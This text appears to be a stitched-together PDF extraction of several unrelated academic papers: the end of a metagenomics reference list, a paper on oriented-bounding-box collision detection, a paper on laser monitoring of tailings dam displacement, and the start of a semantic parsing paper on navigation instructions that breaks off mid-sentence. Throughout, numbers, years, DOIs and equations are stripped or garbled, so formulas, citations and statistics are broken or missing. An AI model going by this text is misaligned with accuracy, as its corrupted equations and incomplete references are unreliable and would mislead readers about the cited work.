review of genetics : – doi . /annurev.genet. . . . schaeffer l, pimentel h, bray n, melsted p, pachter l. . pseudoalignment for metagenomic read assignment. arxiv preprint. arxiv: . v . segata n, waldron l, ballarini a, narasimhan v, jousson o, huttenhower c. . metagenomic microbial community profiling using unique clade-specific marker genes. nature methods : – doi . /nmeth. . lu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /pnas. http://dx.doi.org/ . /tube. . http://dx.doi.org/ . /aem. . . - . http://dx.doi.org/ . /nature http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /srep http://dx.doi.org/ . /nar/gks http://dx.doi.org/ . /srep http://dx.doi.org/ . /nbt. http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /bioinformatics/btn http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /annurev.genet. . . http://arxiv.org/abs/ . v http://dx.doi.org/ . /nmeth. http://dx.doi.org/ . /peerj-cs. sohn m, an l, pookhao n, li q. . accurate genome relative abundance estimation for closely related species in a metagnomic sample. bmc bioinformatics :article doi . / - - - . the international human genome sequencing consortium. . initial sequencing and analysis of the human genome. nature : – doi . / . thiel t, pratte bs, zhong j, goodwin l, copeland a, lucas s, han c, pitluck s, land ml, kyrpides nc, woyke t. . complete genome sequence of anabaena variabilis atcc . standards in genomic sciences : – doi . /sigs. . venter jc, adams md, myers ew, li pw, mural rj, sutton gg, smith ho, yandell m, evans ca, holt ra, gocayne jd, amanatides p, ballew rm, huson dh, wortman jr, zhang q, kodira cd, zheng xh, chen l, skupski m, subramanian g, thomas pd, zhang j, gabor miklos gl, nelson c, broder s, clark ag, nadeau j, mckusick va, zinder n, levine aj, roberts rj, simon m, slayman c, hunkapiller m, bolanos r, delcher a, dew i, fasulo d, flanigan m, florea l, halpern a, han- nenhalli s, kravitz s, levy s, mobarry c, reinert k, remington k, abu-threideh j, beasley e, biddick k, bonazzi v, brandon r, cargill m, chandramouliswaran i, charlab r, chaturvedi k, deng z, di francesco v, dunn p, eilbeck k, evangelista c, gabrielian ae, gan w, ge w, gong f, gu z, guan p, heiman tj, higgins me, ji rr, ke z, ketchum ka, lai z, lei y, li z, li j, liang y, lin x, lu f, merkulov gv, milshina n, moore hm, naik ak, narayan va, neelam b, nusskern d, rusch db, salzberg s, shao w, shue b, sun j, wang z, wang a, wang x, wang j, wei m, wides r, xiao c, yan c, yao a, ye j, zhan m, zhang w, zhang h, zhao q, zheng l, zhong f, zhong w, zhu s, zhao s, gilbert d, baumhueter s, spier g, carter c, cravchik a, woodage t, ali f, an h, awe a, baldwin d, baden h, barnstead m, barrow i, beeson k, busam d, carver a, center a, cheng ml, curry l, danaher s, davenport l, desilets r, dietz s, dodson k, doup l, ferriera s, garg n, gluecksmann a, hart b, haynes j, haynes c, heiner c, hladun s, hostin d, houck j, howland t, ibegwam c, johnson j, kalush f, kline l, koduru s, love a, mann f, may d, mccawley s, mcintosh t, mcmullen i, moy m, moy l, murphy b, nelson k, pfannkoch c, pratts e, puri v, qureshi h, reardon m, rodriguez r, rogers yh, romblad d, ruhfel b, scott r, sitter c, smallwood m, stewart e, strong r, suh e, thomas r, tint nn, tse s, vech c, wang g, wetter j, williams s, williams m, windsor s, winn-deen e, wolfe k, zaveri j, zaveri k, abril jf, guigo r, campbell mj, sjolander kv, karlak b, kejariwal a, mi h, lazareva b, hatton t, narechania a, et al. . the sequence of the human genome. science : – doi . /science. . venter jc, remington k, heidelberg jf, halpern al, rusch d, eisen ja, wu d, paulsen i, nelson ke, nelson w, fouts de, levy s, knap ah, lomas mw, nealson k, white o, peterson j, hoffman j, parsons r, baden-tillson h, pfannkoch c, rogers yh, smith ho. . environmental genome shotgun sequencing of the sargasso sea. science : – doi . /science. . lu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / - - - http://dx.doi.org/ . / http://dx.doi.org/ . /sigs. http://dx.doi.org/ . /science. http://dx.doi.org/ . /science. http://dx.doi.org/ . /peerj-cs. wood de, salzberg sl. . kraken: ultrafast metagenomic sequence classification us- ing exact alignments. genome biology :article r doi . /gb- - - -r . xia lc, cram ja, chen t, fuhrman ja, fengzhu s. . accurate genome relative abundance estimation based on shotgun metgenomic reads. plos one :e doi . /journal.pone. . lu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /gb- - - -r http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /peerj-cs. international conference on sensor network and computer engineering (icsnce ) an improved algorithm of the collision detection based on obb geng chaoyang school of computer science and engineering xi’an technological university xi’an, , china e-mail: gengbox@ .com gao fenli school of computer science and engineering xi’an technological university xi’an, , china e-mail: @qq.com abstract—collision detection plays a vital role in improving the sense of immersion and realism in virtual environment. the bounding box is the most basic collision detection algorithm, the obb intersect test tightness and can able to significantly reduce the number of bounding volume. and try to occupy less storage space. propose a bounding box of direction cylindrical so it can be improved though surrounded objects more close, then improve the efficiency of collision detection. keywords-collision detection; detection algorithms; bounding box of direction cylindrical i. the basic principle of collision detection collision detection is inevitable problems about robot, animated simulation, virtual reality, the basic task is to determine the two or more objects make contact between each other whether or through real-time and accuracy are two important requirements collision detection. a. detection requirements ) test whether there is a collision ) the position of the collision detection ) detection distance between objects ) prediction of the collision of the next time ii. collision detection algorithm classification and compared in the field of collision detection algorithm variety, there is no unified classification standards. here are two aspects of collision detection algorithm classification: from the point of view of a time domain to points; from the point of view of the spatial domain to points. a. detection algorithm based on time domain the detection algorithm based on the time domain from the point of view of time domain to points, collision detection algorithm can be divided into discrete collision detection algorithm and continuous collision detection algorithm of two. because the algorithm time discrete characteristics, this kind of algorithm is at least the following two questions: ) pierce the phenomenon exists. ) missed a collision. b. based on space domain collision detection algorithm classification based on space domain collision detection algorithm has always been the focus of research, according to the different structure they are divided into two types: space division method and the hierarchical bounding volume method. the space division method is used for the entire sequence level division technology to realize, and the hierarchical bounding volume law is in the scene of each object of constructing the rational hierarchical bounding volume to achieve. the object bounding box test is a collision detection algorithm is widely used in a way. common bounding volume of the bounding sphere, of aabb of obb bounding box. ) based on the method of spherical bounding box of collision detection based on the method of spherical bounding box of collision detection in virtual scene, two irregular objects in motion will be the collisions between, can use the spherical bounding box method to carry on the examination, adopt corresponding measures to avoid a collision. as shown in figure first to realize the dynamic pick virtual object, and international conference on sensor network and computer engineering (icsnce ) then based on the actual need, for each of the virtual objects involves creating spherical bounding box. at two objects, get the distance between the two and earn two sphere of their respective radius. when testing conditions have been met, according to the spherical bounding box collision detection algorithm, judge whether the two objects has hit. if there was a collision, will conduct collision response, according to the current characteristics of the virtual object, take different response way. virtual objects up create spherical bounding box centre distance for get sphere radius collision detection collision detection figure . spherical bounding box ) based on the coordinate transformation of the bounding box axial bounding box aabb is defined as the object contains parallel to each side of the coordinate transformation of the smallest hexahedral, is the earliest application of the bounding box. aabb can be expressed as:  among them , , , , , respectively is the aabb in the x, y, z coordinate the projection on the minimum and maximum coordinates. calculation of the object graph respectively of rmb each element of the vertex set x, y and z coordinates of the minimum and maximum can sure, so describe a aabb only six scalar. as shown in figure , aabb intersection between the test is relatively simple, abounding box in the projection of the x-axis minimum value is ,a maximum of b bounding box in the projection of the x-axis minimum value is , b maximum of , if > , a and b do not intersect, if < , a and b do not intersect. if and only if two aabb overlap in the three axes of the projection interval, they intersect. figure . aabb bounding box the aabb advantage of simple structure, easy intersection test, computationally efficient, the drawback is that the object surrounded by enough compact. ) oriented bounding box (obb) and the improvement of it oriented bounding box (obb) and the improvement of its direction the bounding box namely obb ,is to be detected and object contains each side, it by gottschalk put forward in . obb and aabb is the biggest difference of the direction of arbitrariness, can be the shape of the object structure characteristics of the bounding box cuboids any direction, so obb has better tight sex. the bounding box is a very effective collision detection accelerated international conference on sensor network and computer engineering (icsnce ) method , based on obb bounding box here proposes a direction cylindrical bounding box. as shown in figure , direction methods of constructing the bounding box cylinder is, first choose need to tear open outfit parts in the geometric center o = (ox, oy, oz) for vertex, tear open outfit direction v  = (vx, vy, vz) for direction ( v  is the unit vector), tear open outfit distance d for length, tectonic straight line, the parameter equation for:          zz yy xx tvoz tvoy tvox   figure . direction cylinder for the parts of the vertex p, set the line for projection, the center to the distance to o, traverse parts on all point, take the minimum and maximum tmin tmax, parameters interval [tmin, tmax]is parts of all the points on the line of projection parameters interval so the reference ( . ) may be given to the parameter equation is line for:         zz yy xx tvoz tvoy tvox (tmin ≤ t ≤ d + tmax) ( ) have to line said parts in disassembling movement in line in the process of the projection of range, can be used as a direction surrounded by the axis of the cylinder box.for cylindrical bounding box below the radius. for the parts of the vertex p, the p to the center o vectors, point p linear to the distance to u= vop   traverse the parts on the maximum value umax to the radius r of the cylindrical bounding box. so far the direction surrounded by cylindrical box has been built. on the current disassembling parts of the test, at first the cylinder of it to all other parts of real intersection test, find out of the collision of the parts may occur, and then use the disassembling of these parts for accurate parts intersection test. this premise, given the bounding box of the collision of the cylindrical concrete algorithm as follows a) using the method of the introduction to the current disassembling parts of cylindrical bounding box structure direction, set for axis, radius for r, parts center for o, the equation with formula ( . ) said; b) the whole equipment traverse the other parts, the first part i get the ai, (the first time i = , after entering the steps of the time every time i since the ); c) establish a empty set list li; d) to traverse parts of all ai vertex, made the first j a point pij (the first enters, j = , every time you go to the process after when j since the ); e) for some pij, its linear to the distance to uj= vopj   , judge whether uj < r, if found, then turn to step , or turn to step ; f) will point the triangle strips pij connected to join set li; g) to judge the ai traverse parts all vertices are over, if it is to continue step , or turn to step ; h) traverse set li, will equipment running and each of them all triangle triangle strips are surrounded by boxes to cylindrical projection on the vertical axis, precise fellowship test. i) to judge to traverse all parts of the equipment is over, if it is to continue step , or turn to step ; j) the end of the algorithm. different types of testing methods, the characteristics of them are not the same. surrounded by the ball and aabb international conference on sensor network and computer engineering (icsnce ) close degree as flexible oriented bounding box obb, obb was essentially a closest to the object cuboids, only the object of a cuboids’ may, according to the first moment arbitrary rotation. obb surrounded by the ball and aabb than closer to the object, it is consistent with the direction, construction method , but the gender is poorer, the overall obb performance than aabb surrounded the ball, obb bounding box to the basic idea of the method is to use simple geometry instead of complicated geometry novelties, first to object bounding box for rough detection, when the bounding box intersect surrounded by its geometry can be intersection, this can eliminate a large number of impossible at the intersection of geometry and geometric part, which can quickly find at the intersection of geometric part. iii. conclusion direction surrounded by box of inherited the cylindrical obb bounding box the advantages of the intersection of the test in its close the gender is good, can be significantly reduced the number of bounding volume, when some similar to the cylinder's geometry object happened between the collision detection, obb is a better choice, for direction surrounded by box of more suitable for cylinder for cylindrical objects geometry. can more closely, more convenient application, so as to enhance the efficiency of collision detection. after the rotary motion, only need to base the rotation of the coordinate system also can. so for the rigid body reference [ ] sankar jayaram etal. vade: a virtual assembly design environment[j]. ieee computer graphics and applications, ( ), on page - . [ ] ritchie j m, dewar r g, simmons j e l. the generation and practical use of plans for manual assembly using immersive virtual reality [j]. proc inst mech engrs part b (s - ), , ( ): - . [ ] deviprasad t, kesavadas t. virtual prototyping of assembly components using process modeling [j]. journal of manufacturing systems (s - ), , ( ): - . [ ] dewar, r.g., carpenter, i.d, ritchie, j.m. simmons, j.e.l , assembly planning in a virtual environment, picmet ' : portland international conference on management and technology, portland, . [ ] jia zhen hong, hui yang, in collision detection problem [j], journal of software, , ( ): - . [ ] yu qin gao, d space collision detection algorithm of research [d] ,huazhong university of science and technology, master's degree thesis, . [ ] fanzhaohui, china root, gaoshuming. based on parallel fast collision detection algorithm [j]. system simulation journal, , ( ): - . [ ] li kangshun, li yuanxiang, shang mingduan, etc.genetic programming in the application of statistical modeling [j]. system simulation journal, ( ). international conference on sensor network and computer engineering (icsnce ) the design and implementation of displacement monitoring system for tailings dam guoshao chen school of computer science and engineering xi’an technological university xi’an, , china e-mail: @qq.com zhichao lian school of computer science and engineering, xi’an technological university, xi’an, , china e-mail: @qq.com abstract—non-coal mining generally produces a large amount of tailings, and tailings usually accumulate in the canyon between two mountains, and the downstream of the tailings is intercepted by the dam. the dam is called a tailings dam. the development of safety monitoring technology for tailings dam is accompanied by the history of dam construction. the safety of tailings dam is not only related to the normal operation of mining industry, but also to the life safety of downstream residents. once the tailings dam break, the loss caused by the dam is inestimable. in this paper, the laser collimation system is used to monitor the displacement of the dam, and the center of light is measured by the center of gravity, and the laser beam is reconstructed by a lens. the method has the advantages of high accuracy and simultaneous detection of horizontal displacement and vertical displacement of tailings dam. it is a new monitoring technology for dam displacement and has good application prospects. keywords-dam displacement; center of gravity method; laser spot i. summary human beings have begun to develop and use mineral resources a long time ago. china has a rich variety of mining industries, and the mining industry is the basis of various industries. minerals can't be % purity. during the smelting process, the impurities in ores are separated. because the value of impurities can be very small, they accumulate in tailings. with the improvement of smelting technology, the utilization ratio of minerals is becoming higher and higher, but there are still some tailings. a tailings dam has been formed and the tailings dam is used to prevent the dams from tailings. in our country, thousands of such tailing dams are standing large and small. the collapse of the tailings dam occurred, which caused great loss to the life and property of the country and the people, and caused serious pollution to the natural environment. in september , , a special dam break occurred in linfen, shanxi, which killed people and had a very bad impact on the society. in september , , tin tailing dam of guangdong xinyi qian pai village in zijin mining co. the dam failure occurred, the accident caused people missing, people were killed and injured. because of various reasons, many countries have occurred dam break in history. in december , , the french marce broke down. because the management failed to analyze the dam monitoring data in time, it resulted in a disaster that could be avoided. although the history of damming is accompanied by the history of human civilization, it has a history of thousands of years. however, due to various uncertain factors of the dam body, it is difficult to detect the safety of the dam. early monitoring is simply a simple appearance check, and no scientific monitoring means. by the middle of twentieth century, the dam safety monitoring theory system was basically formed. with the appearance of some monitoring instruments and monitoring methods, vertical line method, triangulation method and precise leveling method were used to measure horizontal displacement and vertical displacement. international conference on sensor network and computer engineering (icsnce ) according to the technical code for safety monitoring of dam (sl - ) promulgated in and the technical code for safety monitoring of concrete dams issued in (dl/t - ), dam safety monitoring projects generally include the following aspects. ) monitoring of working conditions: also called environmental monitoring, mainly including water level, water temperature and freezing and so on. ) deformation monitoring: mainly including the horizontal displacement of the dam and the vertical displacement of the dam. ) water leakage monitoring: mainly including the infiltration line of the dam. ) pressure monitoring: mainly including the temperature of the dam, the earth pressure and so on. ) other monitoring: mainly including earthquake monitoring. ii. system overall design in this paper, the image processing method is used to measure the displacement of the dam, and its structure is shown in figure . figure . system structure the laser and laser receiver are fixed on both sides of the mountain. the lens is mounted on the dam body. the laser uses a helium neon laser, and the laser emitted from the light source is projected to the laser receiver through the lens. the laser will form a spot on the receiver. the laser, lens, and laser receiver are in the same line in the ideal condition. when the dam displacement occurs, it will drive the lens to move. the corresponding image is also moving on the laser receiver. by measuring the displacement of the spot on the detector, we can get the displacement of lens system further. figure . monitoring schematic international conference on sensor network and computer engineering (icsnce ) figure is a monitoring schematic. l is a laser, a lens is m, and the center of m is o and o ', y and y' as a laser spot on the laser receiver. when the lens is at o, the l passes through the m imaging at the y point; when the lens is moved to o ', the spot moves to y'. the displacement distance of the lens can be calculated by the ccd system, which is behind the laser receiver, to collect the displacement of the spot. according to the trigonometric relationship )( l l xx x    assuming that the location of the lens is only moving up and down, the length of x and x is known. as long as we can detect the displacement of y accurately, we can further calculate the displacement of the dam. the deformation of the dam body can be obtained by measuring the displacement of each measuring point installed on the dam body. the images captured by the ccd camera should be a perfect dot in the ideal situation. but in practice, there are inevitably some diffraction phenomena, and all kinds of other disturbances will be the deformation of the spot, so that the ideal center position of the spot will be deviate from the actual position. so we must first filter the image collected by ccd to carry out the next process. iii. gravity method in this paper, the center of laser spot is extracted by the method of center of gravity extraction. when using the center of gravity method to deal with the spot, the image is first two valued, and then the spot area is identified. the accuracy of this method is relatively high and the speed is faster. the center of gravity method is only applicable to the symmetry pattern. if the image is asymmetrical, there will be a lot of deviation. the basic principle of the gravity method is to replace the geometric center of the image with the energy center of the image. the gray value of the pixel of the image is p. the center of gravity coordinates are (x, y)     i ii p px x      i ii p py y  ni .... , ,  in order to improve the reliability of the system, every measuring point must be measured several times, and the position of the spot can be calculated according to the measured data. ccd is repeatedly sampled to get the average value, so as to improve the accuracy. iv. hardware introduction the system consists of six parts is shown in figure : figure . system hardware a. laser the laser has high luminance, very small divergence angle and good monochromatic property; because of these unique properties, it is used as a quasi straight line in this system. b. lens system in this system, the beam of laser is reshaped, the quality of beam is improved, and the accuracy of measurement is improved. optical lens is used to realize it. in practical application, fresnel lens is used. c. laser receiver the translucent scattering glass similar to the wool glass is convenient for the camera to collect the spot of the light spot. international conference on sensor network and computer engineering (icsnce ) d. camera the receiver module uses the camera, and the application of the camera is very common. in this system, it is mainly used to accept the laser spot image. e. processor an intelligent chip is used to analyze the image, and the amount of displacement is calculated. it mainly includes hardware design and software design. and the data will be sent to the wireless module. f. zigbee wireless module the system uses the wireless module to transmit the deformable data to the base station, and overcomes the difficulty of long distance wiring, and uses the popular zigbee to implement it. zigbee is a wireless network transmission technology which has been developed in recent years, which is adaptable to short distance, low rate and low power consumption. v. conclusion in this paper, the dam displacement monitoring system is designed in detail, including hardware structure design and image processing algorithm. the system is tested in the tailings dam, the data is accurate. due to the transmission of laser in the air, the visibility of the air is reduced, the brightness of the laser spot is insufficient, so the data cannot be collected sometimes. acknowledgment fund support: shaanxi education department special fund project number: shaanxi education finance[ ] vi. reference [ ] tailings beach length monitoring system research based on digital image processing zhang yulei [ ] tailings dam displacement monitoring system based on laser collimation method design ru naiyu [ ] tailings safety monitoring system based on silverlight zhang cheng [ ] high precision positioning algorithm for laser spot center research chen he; yang zhihao; guo pan; zhang yinchao; chen siying beijing institute of technology journal. [ ] astronomical instruments in image tracking algorithm of the comparative study of wang lili; hu chinese; season hangxin astronomy. transactions of the association for computational linguistics, ( ) – . action editor: jason eisner. submitted / ; published / . c© association for computational linguistics. weakly supervised learning of semantic parsers for mapping instructions to actions yoav artzi and luke zettlemoyer computer science & engineering university of washington seattle, wa {yoav,lsz}@cs.washington.edu abstract the context in which language is used pro- vides a strong signal for learning to recover its meaning. in this paper, we show it can be used within a grounded ccg semantic parsing approach that learns a joint model of mean- ing and context for interpreting and executing natural language instructions, using various types of weak supervision. the joint nature provides crucial benefits by allowing situated cues, such as the set of visible objects, to di- rectly influence learning. it also enables algo- rithms that learn while executing instructions, for example by trying to replicate human ac- tions. experiments on a benchmark naviga- tional dataset demonstrate strong performance under differing forms of supervision, includ- ing correctly executing % more instruction sets relative to the previous state of the art. introduction the context in which natural language is used pro- vides a strong signal to reason about its meaning. however, using such a signal to automatically learn to understand unrestricted natural language remains a challenging, unsolved problem. for example, consider the instructions in figure . correct interpretation requires us to solve many sub- problems, such as resolving all referring expres- sions to specific objects in the environment (includ- ing, “the corner” or “the third intersection”), disam- biguating word sense based on context (e.g., “the chair” could refer to a chair or sofa), and finding executable action sequences that satisfy stated con- straints (such as “twice” or “to face the blue hall”). move forward twice to the chair λa.move(a) ∧dir(a,forward) ∧ len(a, ) ∧ to(a,ιx.chair(x)) at the corner turn left to face the blue hall λa.pre(a,ιx.corner(x)) ∧ turn(a) ∧dir(a,left) ∧ post(a,front(you,ιx.blue(x) ∧hall(x))) move to the chair in the third intersection λa.move(a) ∧ to(a,ιx.sofa(x)) ∧ intersect(order(λy.junction(y),frontdist, ),x) figure : a sample navigation instruction set, paired with lambda-calculus meaning representations. we must also understand implicit requests, for ex- ample from the phrase “at the corner,” that describe goals to be achieved without specifying the specific steps. finally, to do all of this robustly without pro- hibitive engineering effort, we need grounded learn- ing approaches that jointly reason about meaning and context to learn directly from their interplay, with as little human intervention as possible. although many of these challenges have been studied separately, as we will review in section , this paper represents, to the best of our knowledge, the first attempt at a comprehensive model that ad- dresses them all. our approach induces a weighted combinatory categorial grammar (ccg), includ- ing both the parameters of the linear model and a ccg lexicon. to model complex instructional lan- guage, we introduce a new semantic modeling ap- proach that can represent a number of key linguistic constructs that are common in spatial and instruc- tional language. to learn from indirect supervision, we define the notion of a validation function, for example that tests the state of the agent after in- terpreting an instruction. we then show how this function can be used to drive online learning. for that purpose, we adapt the loss-sensitive perceptron algorithm (singh-miller & collins, ; artzi & zettlemoyer, ) to use a validation function and coarse-to-fine inference for lexical induction. the joint nature of this approach provides crucial benefits in that it allows situated cues, such as the set of visible objects, to directly influence parsing and learning. it also enables the model to be learned while executing instructions, for example by trying to replicate actions taken by humans. in particular, we show that, given only a small seed lexicon and a task-specific executor, we can induce high quality models for interpreting complex instructions. we evaluate the method on a benchmark naviga- tional instructions dataset (macmahon et al., ; chen & mooney, ). our joint approach suc- cessfully completes % more instruction sets rel- ative to the previous state of the art. we also re- port experiments that vary supervision type, finding that observing the final position of an instruction ex- ecution is nearly as informative as observing the en- tire path. finally, we present improved results on a new version of the macmahon et al. ( ) corpus, which we filtered to include only executable instruc- tions paired with correct traces. technical overview task let s be the set of possible environment states and a be the set of possible actions. given a start state s ∈ s and a natural language instruc- tion x, we aim to generate a sequence of actions ~a = 〈a , . . . ,an〉, with each ai ∈ a, that performs the steps described in x. for example, in the navigation domain (macma- hon et al., ), s is a set of positions on a map. each state s = (x,y,o) is a triple, where x and y are integer grid coordinates and o ∈{ , , , } is an orientation. figure shows an example map with states; the ones we use in our experiments con- tain an average of . the space of possible actions a is {left, right, move, null}. actions change the state of the world according to a transition func- tion t : a×s → s. in our navigation example, moving forward can change the x or y coordinates while turning changes the orientation o. model to map instructions to actions, we jointly reason about linguistic meaning and action execu- tion. we use a weighted ccg grammar to rank pos- sible meanings z for each instruction x. section defines how to design such grammars for instruc- tional language. each logical form z is mapped to a sequence of actions ~a with a deterministic executor, as described in section . the final grounded ccg model, detailed in section . , jointly constructs and scores z and ~a, allowing for robust situated reason- ing during semantic interpretation. learning we assume access to a training set con- taining n examples {(xi,si,vi) : i = . . .n}, each containing a natural language sentence xi, a start state si, and a validation function vi. the validation function vi : a → { , } maps an action sequence ~a ∈ a to if it’s correct according to available su- pervision, or otherwise. this training data contains no direct evidence about the logical form zi for each xi, or the grounded ccg analysis used to construct zi. we model all these choices as latent variables. we experiment with two validation functions. the first, vd(~a), has access to an observable demonstra- tion of the execution ~ai, a given ~a is valid iff ~a = ~ai. the second, vsi (~a), only encodes the final state s′i of the execution of x, therefore ~a is valid iff its final state is s′i. since numerous logical forms often ex- ecute identically, both functions provide highly am- biguous supervision. evaluation we evaluate task completion for sin- gle instructions on a test set {(xi,si,s′i) : i = . . .n}, where s′i is the final state of an oracle agent following the execution of xi starting at state si. we will also report accuracies for correctly interpreting instruction sequences ~x, where a single error can cause the entire sequence to fail. finally, we report accuracy on recovering correct logical forms zi on a manually annotated subset of the test set. related work our learning is inspired by the reinforcement learn- ing (rl) approach of branavan et al. ( ), and related methods (vogel & jurafsky, ), but uses latent variable model updates within a semantic parser. branavan et al. ( ) extended their rl ap- proach to model high-level instructions, which cor- respond to implicit actions in our domain. wei et al. ( ) and kollar et al. ( ) used shallow linguis- tic representations for instructions. recently, tellex et al. ( ) used a graphical model semantics rep- resentation to learn from instructions paired with demonstrations. in contrast, we model significantly more complex linguistic phenomena than these ap- proaches, as required for the navigation domain. other research has adopted expressive meaning representations, with differing learning approaches. matuszek et al. ( , ) describe supervised al- gorithms that learn semantic parsers for navigation instructions. chen and mooney ( ), chen ( ) and kim and mooney ( ) present state-of-the- art algorithms for the navigation task, by training a supervised semantic parser from automatically in- duced labels. our work differs in the use of joint learning and inference approaches. supervised approaches for learning semantic parsers have received significant attention, e.g. kate and mooney ( ), wong and mooney ( ), muresan ( ) and kwiatkowski et al. ( , ). the algorithms we develop in this pa- per combine ideas from previous supervised ccg learning work (zettlemoyer & collins, , ; kwiatkowski et al., ), as we describe in sec- tion . recently, various alternative forms of su- pervision were introduced. clarke et al. ( ), goldwasser and roth ( ) and liang et al. ( ) describe approaches for learning semantic parsers from sentences paired with responses, krishna- murthy and mitchell ( ) describe using distant supervision, artzi and zettlemoyer ( ) use weak supervision from conversational logs and gold- wasser et al. ( ) present work on unsupervised learning. we discuss various forms of supervision that complement these approaches. there has also been work on learning for semantic analysis tasks from grounded data, including event streams (liang et al., ; chen et al., ) and language paired with visual perception (matuszek et al., ). finally, the topic of executing instructions in non-learning settings has received significant atten- tion (e.g., winograd ( ), di eugenio and white ( ), webber et al. ( ), bugmann et al. ( ), macmahon et al. ( ) and dzifcak et al. ( )). background we use a weighted linear ccg grammar for seman- tic parsing, as briefly reviewed in this section. combinatory categorial grammars (ccgs) ccgs are a linguistically-motivated formalism for modeling a wide range of language phenom- ena (steedman, , ). a ccg is defined by a lexicon and a set of combinators. the lexicon con- tains entries that pair words or phrases with cate- gories. for example, the lexical entry chair ` n : λx.chair(x) for the word “chair” in the parse in fig- ure pairs it with a category that has syntactic type n and meaning λx.chair(x). figure shows how a ccg parse builds a logical form for a complete sen- tence in our example navigation domain. starting from lexical entries, each intermediate parse node, including syntax and semantics, is constructed with one of a small set of ccg combinators (steedman, , ). we use the application, composition and coordination combinators, and three others de- scribed in section . . factored ccg lexicons recently, kwiatkowski et al. ( ) introduced a factored ccg lexicon representation. each lexical item is composed of a lexeme and a template. for example, the entry chair ` n : λx.chair(x) would be constructed by combining the lexeme chair ` [chair], which con- tains a word paired with logical constants, with the template λv.[n : λx.v(x)], that defines the rest of the category by abstracting over logical constants. this approach allows the reuse of common syntactic structures through a small set of templates. section describes how we learn such lexical entries. weighted linear ccgs a weighted linear ccg (clark & curran, ) ranks the space of possible parses under the grammar, and is closely related to several other approaches (lafferty et al., ; collins, ; taskar et al., ). let x be a sentence, y be a ccg parse, and gen(x; Λ) be the set of all possible ccg parses for x given the lexi- con Λ. define φ(x,y) ∈ rd to be a d-dimensional feature–vector representation and θ ∈ rd to be a pa- rameter vector. the optimal parse for sentence x is y∗(x) = arg max y∈gen(x;Λ) θ ·φ(x,y) and the final output logical form z is the λ-calculus expression at the root of y∗(x). section . de- scribes how we efficiently compute an approxima- tion to y∗(x) within the joint interpretation and exe- cution model. supervised learning with genlex previous work (zettlemoyer & collins, ) introduced a function genlex(x,z) to map a sentence x and its meaning z to a large set of potential lexical entries. these entries are generated by rules that consider the logical form z and guess potential ccg categories. for example, the rule p → n : λx.p(x) introduces categories commonly used to model certain types of nouns. this rule would, for example, introduce the category n : λx.chair(x) for any logical form z that contains the constant chair. genlex uses a small set of such rules to generate categories that are paired with all possible substrings in x, to create a large set of lexical entries. the complete learning algorithm then simultaneously selects a small sub- set of these entries and estimates parameter values θ. in section , we will introduce a new way of using genlex to learn from different signals that, crucially, do not require a labeled logical form z. spatial environment modeling we will execute instructions in an environment, see section , which has a set of positions. a position is a triple (x,y,o), where x and y are horizontal and vertical coordinates, and o ∈ o = { , , , } is an orientation. a position also includes properties indicating the object it contains, its floor pattern and its wallpaper. for example, the square at ( , ) in figure has four positions, one per orientation. because instructional language refers to objects and other structures in an environment, we introduce the notion of a position set. for example, in figure , the position set d = {( , ,o) : o ∈ o} represents a chair, while b = {(x, ,o) : o ∈ o,x ∈ [ . . . ]} represents the blue floor. both sets contain all ori- entations for each (x,y) pair, thereby representing properties of regions. position sets can have many properties. for example, e, in addition to being a chair, is also an intersection because it overlaps with the neighboring halls a and b. the set of possi- ble entities includes all position sets and a few addi- tional entries. for example, set c = {( , , )} in figure represents the agent’s position. modeling instructional language we aim to design a semantic representation that is learnable, models grounded phenomena such as spa- x   y                               c   d  e   a   b   { d   e   } (a) chair λx.chair(x){ a   b   } (b) hall λx.hall(x) e   (c) the chair ιx.chair(x) c   (d) you you{ b   } (e) blue hall λx.hall(x) ∧ blue(x) { e   } (f) chair in the intersection λx.chair(x) ∧ intersect(ιy.junction(y),x){ a   b   e   } (g) in front of you λx.in front of(you,x) figure : schematic diagram of a map environment and example of semantics of spatial phrases. tial relations and object reference, and is executable. our semantic representation combines ideas from carpenter ( ) and neo-davidsonian event se- mantics (parsons, ) in a simply typed λ- calculus. there are four basic types: ( ) entities e that are objects in the world, ( ) events ev that spec- ify actions in the world, ( ) truth values t, and ( ) meta-entities m, such as numbers or directions. we also allow functional types, which are defined by in- put and output types. for example, 〈e,t〉 is the type of function from entities to truth values. . spatial language modeling nouns and noun phrases noun phrases are paired with e-type constants that name specific en- tities and nouns are mapped to 〈e,t〉-type expres- sions that define a property. for example, the noun “chair” (figure a) is paired with the expression λx.chair(x), which defines the set of objects for which the constant chair returns true. the deno- tation of this expression is the set {d,e} in fig- ure and the denotation of λx.hall(x) (figure b) is {a,b}. also, the noun phrase “you” (figure d), which names the agent, is represented by the con- stant you with denotation c, the agent’s position. determiners noun phrases can also be formed by combining nouns with determiners that pick out spe- cific objects in the world. we consider both definite reference, which names contextually unique objects, and indefinites, which are less constrained. the definite article is paired with a logical expres- sion ι of type 〈〈e,t〉,e〉, which will name a sin- gle object in the world. for example, the phrase “the chair” in figure c will be represented by ιx.chair(x) which will denote the appropriate chair. however, computing this denotation is challenging when there is perceptual ambiguity, for positions where multiple chairs are visible. we adopt a sim- ple heuristic approach that ranks referents based on a combination of their distance from the agent and whether they are in front of it. for our example, from position c our agent would pick the chair e in front of it as the denotation. the approach dif- fers from previous, non-grounded models that fail to name objects when faced with such ambiguity (e.g., carpenter ( ), heim and kratzer ( )). to model the meaning of indefinite articles, we depart from the frege-montague tradition of us- ing existential quantifiers (lewis, ; montague, ; barwise & cooper, ), and instead in- troduce a new quantifier a that, like ι, has type 〈〈e,t〉,e〉. for example, the phrase “a chair” would be paired with ax.chair(x) which denotes an arbi- trary entry from the set of chairs in the world. com- puting the denotation for such expressions in a world will require picking a specific object, without fur- ther restrictions. this approach is closely related to steedman’s generalized skolem terms ( ). meta entities we use m-typed terms to represent non-physical entities, such as numbers ( , , etc.) and directions (left, right, etc.) whose denotations although quantifiers are logical constants with type 〈〈e,t〉,e〉 or 〈〈e,t〉, t〉, we use a notation similar to that used for first-order logic. for example, the notation ιx.f(x) repre- sents the logical expression ι(λx.f(x)) steedman ( ) uses generalized skolem terms as a tool for resolving anaphoric pronouns, 